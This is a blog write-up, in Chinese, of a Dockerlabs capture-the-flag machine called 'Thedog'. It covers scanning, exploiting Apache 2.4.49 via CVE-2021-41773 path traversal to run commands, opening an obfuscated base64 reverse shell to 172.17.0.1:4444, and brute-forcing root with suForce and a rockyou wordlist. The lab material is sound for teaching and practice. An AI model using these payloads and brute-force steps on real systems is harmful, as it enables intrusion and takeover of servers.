跳过正文
HYH’s Blog

Dockerlabs-Thedog

·481 字·3 分钟
Dockerlabs Dockerlabs Linux
HYH
作者
HYH
一名专注于网络安全、渗透测试与 CTF 挑战的技术爱好者,热衷于记录实战经验、分享工具与技术,致力于持续学习与成长。
目录

NMAP
# 

[root@kali] /home/kali/thedog  
❯ nmap 172.17.0.2 -sV -A -p-   

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.49 ((Unix))
|_http-title: Comando Ping
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.49 (Unix)
MAC Address: 02:42:AC:11:00:02 (Unknown)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop

Nuclei
# 

[root@kali] /home/kali/thedog  
❯ nuclei -u http://172.17.0.2                                                                                                                 ⏎

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.2

                projectdiscovery.io

[INF] Current nuclei version: v3.4.2 (outdated)
[INF] Current nuclei-templates version: v10.2.2 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 65
[INF] Templates loaded for current scan: 7991
[INF] Executing 7793 signed templates from projectdiscovery/nuclei-templates
[WRN] Loading 198 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] Templates clustered: 1743 (Reduced 1638 Requests)
[INF] Using Interactsh Server: oast.me
[CVE-2021-41773:RCE] [http] [high] http://172.17.0.2/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh
[http-trace:trace-request] [http] [info] http://172.17.0.2
[http-trace:options-request] [http] [info] http://172.17.0.2
[missing-sri] [http] [info] http://172.17.0.2 ["https://cdn.jsdelivr.net/npm/bootstrap@5.3.2/dist/css/bootstrap.min.css"]
[waf-detect:apachegeneric] [http] [info] http://172.17.0.2
[http-missing-security-headers:cross-origin-opener-policy] [http] [info] http://172.17.0.2
[http-missing-security-headers:content-security-policy] [http] [info] http://172.17.0.2
[http-missing-security-headers:x-permitted-cross-domain-policies] [http] [info] http://172.17.0.2
[http-missing-security-headers:referrer-policy] [http] [info] http://172.17.0.2
[http-missing-security-headers:cross-origin-resource-policy] [http] [info] http://172.17.0.2
[http-missing-security-headers:strict-transport-security] [http] [info] http://172.17.0.2
[http-missing-security-headers:permissions-policy] [http] [info] http://172.17.0.2
[http-missing-security-headers:x-frame-options] [http] [info] http://172.17.0.2
[http-missing-security-headers:x-content-type-options] [http] [info] http://172.17.0.2
[http-missing-security-headers:clear-site-data] [http] [info] http://172.17.0.2
[http-missing-security-headers:cross-origin-embedder-policy] [http] [info] http://172.17.0.2
[tech-detect:jsdelivr] [http] [info] http://172.17.0.2
[tech-detect:bootstrap] [http] [info] http://172.17.0.2
[apache-detect] [http] [info] http://172.17.0.2 ["Apache/2.4.49 (Unix)"]
[options-method] [http] [info] http://172.17.0.2 ["GET,POST,OPTIONS,HEAD,TRACE"]

CVE-2021-41773
#

经过信息收集,得到以下命令执行的方式

[root@kali] /home/kali/thedog  
❯ curl -v --data "echo;id"  'http://172.17.0.2/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh'          
*   Trying 172.17.0.2:80...
* Connected to 172.17.0.2 (172.17.0.2) port 80
* using HTTP/1.x
> POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1
> Host: 172.17.0.2
> User-Agent: curl/8.12.1
> Accept: */*
> Content-Length: 7
> Content-Type: application/x-www-form-urlencoded
> 
* upload completely sent off: 7 bytes
< HTTP/1.1 200 OK
< Date: Fri, 30 May 2025 12:13:00 GMT
< Server: Apache/2.4.49 (Unix)
< Transfer-Encoding: chunked
< 
uid=33(www-data) gid=33(www-data) groups=33(www-data)
* Connection #0 to host 172.17.0.2 left intact

进行反弹shell

[root@kali] /home/kali/thedog  
❯ curl -v --data "echo;printf KGJhc2ggPiYgL2Rldi90Y3AvMTcyLjE3LjAuMS80NDQ0IDA+JjEpICY=|base64 -d|bash"  'http://172.17.0.2/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh'

Root
#

由于无法直接下载文件,这里通过base64来转一下suForce

[root@kali] /home/kali/Desktop/suForce (main) 
❯ cat suForce| base64                                     
<base64>

www-data@a42e9cb76c1d:/tmp$ echo <base64> | base64 -d > suForce

[root@kali] /home/kali/Desktop 
❯ head -n 500 /usr/share/wordlists/rockyou.txt |base64
<base64>

www-data@a42e9cb76c1d:/tmp$ echo <base64> | base64 -d > pass.txt

然后进行爆破

www-data@a42e9cb76c1d:/tmp$ ./suForce -u root -w pass.txt 
            _____                          
 ___ _   _ |  ___|__  _ __ ___ ___   
/ __| | | || |_ / _ \| '__/ __/ _ \ 
\__ \ |_| ||  _| (_) | | | (_|  __/  
|___/\__,_||_|  \___/|_|  \___\___|  
───────────────────────────────────
 code: d4t4s3c     version: v1.0.0
───────────────────────────────────
🎯 Username | root
📖 Wordlist | pass.txt
🔎 Status   | 50/500/10%/hannah
💥 Password | hannah
───────────────────────────────────


www-data@a42e9cb76c1d:/tmp$ 
www-data@a42e9cb76c1d:/tmp$ su root
Password: 
root@a42e9cb76c1d:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
root@a42e9cb76c1d:/tmp# ls /root/
root@a42e9cb76c1d:/tmp#
Reply by Email